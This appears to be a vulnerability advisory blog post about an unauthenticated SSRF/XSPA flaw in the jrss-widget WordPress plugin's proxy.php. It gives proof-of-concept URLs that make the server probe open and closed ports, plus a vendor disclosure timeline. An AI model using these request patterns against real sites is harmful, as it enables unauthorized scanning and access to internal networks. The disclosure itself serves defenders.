wp-plugin : jrss-widget – SSRF/XSPA

 

Plugin Details

 

Plugin Name : jrss-widget

 

Effected Version : 1.2 (and most probably lower version's if any)

 
Vulnerability : SSRF/XSPA
 
Identified by : Prajal Kulkarni

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 

1. Test for Open port 80 :
http://localhost/wordpress/wp-content/jrss-widget/proxy.php?url=http://scanme.nmap.org:80

OpenPort80
2. Test for Open NON HTTP Ports (like SSH, FTP, SMTP etc) :
http://127.0.0.1/wordpress/wp-content/wp-plugs/jrss-widget/proxy.php?url=http://scanme.nmap.org:22

OpenPort22

3. Test for Closed Port 21:
localhost/wordpress/wp-content/wp-plugs/jrss-widget/proxy.php?url=http://scanme.nmap.org:21
ClosedPort21

 

Disclosure Timeline

 

Vendor Contacted : 2013-12-26

 
Plugin Status : Closed
 
Public Disclosure : May 28, 2014
 
CVE Number : Not assigned yet

 
Plugin Description :
 
`jRSS Widget` is a jquery based RSS reader widget.

= There are the following configuration options: =

* Select feed URL
* Choose width of the readerbox
* Choose height of the readerbox

Leave a Reply

Your email address will not be published. Required fields are marked *